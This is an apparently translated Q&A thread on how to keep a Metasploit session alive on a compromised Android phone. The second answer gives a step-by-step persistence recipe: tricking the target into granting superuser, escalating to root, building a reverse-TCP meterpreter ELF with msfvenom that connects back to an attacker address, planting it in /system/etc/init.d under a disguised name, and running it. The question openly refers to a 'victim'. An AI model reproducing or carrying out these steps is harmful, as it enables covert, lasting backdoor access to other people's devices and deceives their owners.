Kali Linux metasploit y ataque de Android con PAYLOAD

1

En kali linux 2.0, cuando ejecuto exploit en msfconsole y la víctima abre mi carga, ¿cómo puedo forzar la sesión para que sea persistente?

    
pregunta MohammadRezaHosseini 21.03.2016 - 19:09
fuente

2 respuestas

2

Para las plataformas de Android, al usar el proyecto metasploit-framework, necesitará utilizar meterpreter como una instalación de APK para establecer la persistencia.

La descarga de android está disponible aquí: enlace

Puede encontrar una publicación más detallada que explica todas las dependencias aquí - enlace

    
respondido por el atdre 21.03.2016 - 19:56
fuente
0

En parte, un resumen de lo que ya se ha dicho:

1) Compruebe si el objetivo ha enraizado su teléfono . Si lo ha hecho, use la ingeniería social para solicitar privilegios de superusuario a través de un aviso con

Runtime.getRuntime().exec("su");

Y usa el proceso raíz para realizar los pasos 5 y 6

2) De lo contrario, busque un exploit, por ejemplo, vaya aquí y desplácese hacia abajo a Android .

2.5) Espero que el objetivo ignore el "Nuevo software disponible!"  pedir a menudo

3) Elevar los privilegios de su sesión a la raíz. Si no puedes, no hay suerte. Espero que cargue bien su teléfono.

4) Cree un binario ELF que se ejecutará al inicio

msfvenom -p android/meterpreter/reverse_tcp -f elf LHOST= 192.168.43.107 LPORT=4444 R > /root/backdoor.elf

5) Cópielo en la ubicación remota con un nombre normal (mountsd)

meterpreter> upload backdoor.elf /system/etc/init.d/92mountsd.elf

6) Ejecutarlo (o esperar a que se reinicie)

meterpreter> execute /system/etc/init.d/92mountsd.elf
    
respondido por el J.A.K. 11.01.2017 - 00:53
fuente

Lea otras preguntas en las etiquetas